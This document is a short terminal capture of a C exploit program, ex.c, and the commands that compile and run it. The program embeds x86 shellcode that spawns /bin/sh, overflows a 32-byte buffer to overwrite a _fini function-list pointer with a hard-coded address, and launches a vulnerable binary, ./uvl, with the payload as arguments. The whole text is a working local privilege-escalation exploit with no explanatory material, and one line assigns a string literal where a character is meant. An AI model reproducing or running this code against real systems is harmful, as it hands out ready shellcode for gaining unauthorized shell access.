# cat ex.c

 

char shellcode[]="\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"

        "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"

        "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";

char addr[5]="AAAA\x00";

char buf[37];

int *p;

 

main()

{

    memset(buf, 'A', 32);

    p = (int *)(buf + 32);

    *p = 0x400a243c;  //fnlist    _fini

 

    buf[36] = "\0";

    p = (int *) addr;

    *p = 0xbfffff9b;     // Call function address: start address of shellcode

 

    execl("./uvl", shellcode, buf, addr, 0, 0);

}

 

 

 

 

 

# gcc -o ex ex.c

 

# ./ex

 

 

 

}